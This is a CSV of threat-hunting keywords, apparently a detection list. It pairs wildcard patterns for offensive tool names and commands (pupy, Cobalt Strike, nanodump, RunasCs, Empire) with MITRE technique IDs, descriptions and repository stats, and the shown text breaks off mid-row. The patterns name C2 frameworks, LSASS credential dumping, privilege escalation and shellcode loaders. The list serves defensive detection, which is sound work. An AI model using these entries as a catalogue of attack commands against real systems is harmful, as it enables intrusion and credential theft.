TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run android_cam *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run --bg shell_exec*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run -Executable *.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*run interactive_shell*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run keylogger*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run memory_exec *.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run mouselogger*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run post/windows/gather/checkvm*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run post/windows/manage/killfw*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run post/windows/manage/migrate*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run pyexec *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run shell_exec *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run shellcode_exec*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Run the krbscm method for SYSTEM shell*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*run thief:latest*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*run_ppl_dump_exploit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*run_ppl_medic_exploit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*run_server.bat,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*runasadmin uac-cmstplua*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*runasadmin uac-token-duplication*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*RunasCreateProcessAsUserW*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs.exe*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs.exe*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs.zip*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs_net2.exe*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs_net2.exe*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCsMain*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs-master*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*runas-netonly *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*runasppl_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*RunAsWinTcb.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*RunAsWinTcb-master*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*run-dll SharpSploit*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*rundll32 charlotte.dll*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*rundll32*.dll*a*/p:*,greyware_tool_keyword,rundll32,Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.,T1055.002 - T1078.002 - T1134.001 - T1134.002,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*rundll32*.dll*StartW*,greyware_tool_keyword,rundll32,Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.,T1218.005 - T1071.001,TA0002 - TA0003,N/A,N/A,Exploitation Tools,https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence,1,0,greyware tool - risks of False positive !,N/A,10,1224,189,2022-07-14T07:15:10Z,2021-01-01T16:44:42Z -*rundll32.exe agressor.dll*dec*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*RunDLL32JSStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Run-EXEonRemote*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*runFakeTerminal*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*Running final exploit packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*running SharpHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*RunOF.exe -*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,0,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*RunOF.Internals*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*runShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 